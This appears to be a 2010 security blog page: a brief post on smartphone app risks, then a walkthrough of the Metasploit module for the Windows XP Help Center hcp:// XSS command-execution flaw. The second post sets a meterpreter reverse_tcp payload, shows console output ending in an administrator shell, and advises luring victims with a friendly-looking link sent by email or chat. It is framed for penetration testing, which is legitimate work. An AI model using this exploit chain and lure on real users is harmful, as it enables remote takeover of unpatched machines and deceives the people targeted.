Thursday, June 17, 2010


Smartphones have become an integral part of our lives; we rely on them for everything. They hold all of our personal information, calendars, emails, phone numbers, text messages, and documents. However, the average user is not very savvy when it comes to the security of these devices. A user can browse to one of the many app stores and download just about anything, and most users do just that. One of the exciting things about smartphones is the customization of them. You can get any type of application you want, and most of the time it is free. You can get games, productivity applications, web servers, and ftp servers. Users feel a false sense of security because it is “just a phone” and the apps must be secure because they are getting them from an app store. These apps are developed by programmers of varying levels and skill sets, and security might not be their top priority. None of the app stores put the apps through a thorough security check; most run virus scans but it is usually done randomly and done after the app is posted. Even Apple has fallen victim to mobile malware. Some apps have even been signed safe by the stores only to have malicious code be discovered at a later date. Samsung’s Wave shipped with malware installed on the SD card, which activated as soon as it was connected to a PC.

Read more!

Monday, June 14, 2010

Windows XP Help Center Client Side Attack

With the patch Tuesday release of XP zero days last week i started checking around for Proof of concepts and ran across the following posts.

The above advisories are for windows XP which many businesses still run, and utilizes a XSS attack which many developers and site owners feel isn't really a threat, read below to find out why XSS is dangerous.

After reading the above advisories I checked in metasploit and a working exploit is already available within the exploit framework.

If you are on an internal or client side test penetration test you generally see most clients running windows XP and generally outdated browsers. They are either using IE6 or IE7 or IE8. The above advisories describe a way of using a cross site scripting attack to gain full control of the victim. The essence of this attack is that an un-handled XSS is utilized in hcp://system/sysinfo/sysinfomain.htm?svr=, which can be directly accessed via a url in a browser. By using a defer in a XSS to execute a script in a privileged zone a windows popup is bypassed thus not needing a victim to click any annoying popups to make the attack work.

<script defer>code</script>

"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "

The help center exploit works on xp sp2 and sp3 which covers most clients in most companies. I do not see many companies running vista or windows7.... IE6 and IE7 browsers are vulnerable to this attack without a popup however IE8 works but with a user popup box unless the victim is running certain versions of media player... I also just tested this with a IE8 browser running in comparability mode... When the client visited the page Automatically the exploit pulled up the help docs and gave me a meterpreter shell, wooooot
I am thinking this would be a good exploit to use in client side penetration tests... So below is the info and a quick usage of the exploit...

Module Name:

Below is a description and then usage of the module... give it a try...

Description: (From Metasploit)
"Help and Support Center is the default application provided to
access online documentation for Microsoft Windows. Microsoft
supports accessing help documents directly via URLs by installing a
protocol handler for the scheme "hcp". Due to an error in validation
of input to hcp:// combined with a local cross site scripting
vulnerability and a specialized mechanism to launch the XSS trigger,
arbitrary command execution can be achieved. On IE6 and IE7 on XP
SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
but if WMP9 is installed, WMP9 can be used for automatic execution.
If IE8 and WMP11, a dialog box will ask the user if execution should
continue. Automatic detection of these options is implemented in
this module, and will default to not sending the exploit for
IE8/WMP11 unless the option is overridden."

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*] Local IP:
[*] Server started.

Send Your Link to the Victim and wait:
Now send the victim out a link to your IP address via email or chat. Generally i would have a registered URL that looks friendly and send them that URL in order to not look too suspicious.

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for "/" does not contain a sub-directory, redirecting to /c3hfRM5Kh/ ...
[*] Sending Microsoft Help Center XSS and Command Execution to
[*] Responding to request for exploit iframe at
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Jun 11 18:10:38 -0400 2010

msf exploit(ms10_xxx_helpctr_xss_
cmd_exec) > sessions -l
Active sessions
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter EXPLOIT\Administrator @ EXPLOIT ->
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: EXPLOIT\Administrator

Final Notes:
With the coming of a new patch tuesday, a whole slew of exploits are available for windows XP. The moral of the story is, UPDATE YOUR SYSTEMS.The metasploit module above sets up a server and waits for your victim to make a connection, when the victim does make a connection a help window is opened and they are silently owned.... More then likely the victim will just think windows is acting up as windows usually does or perhaps the user accidentally clicked something :) :)

Read more!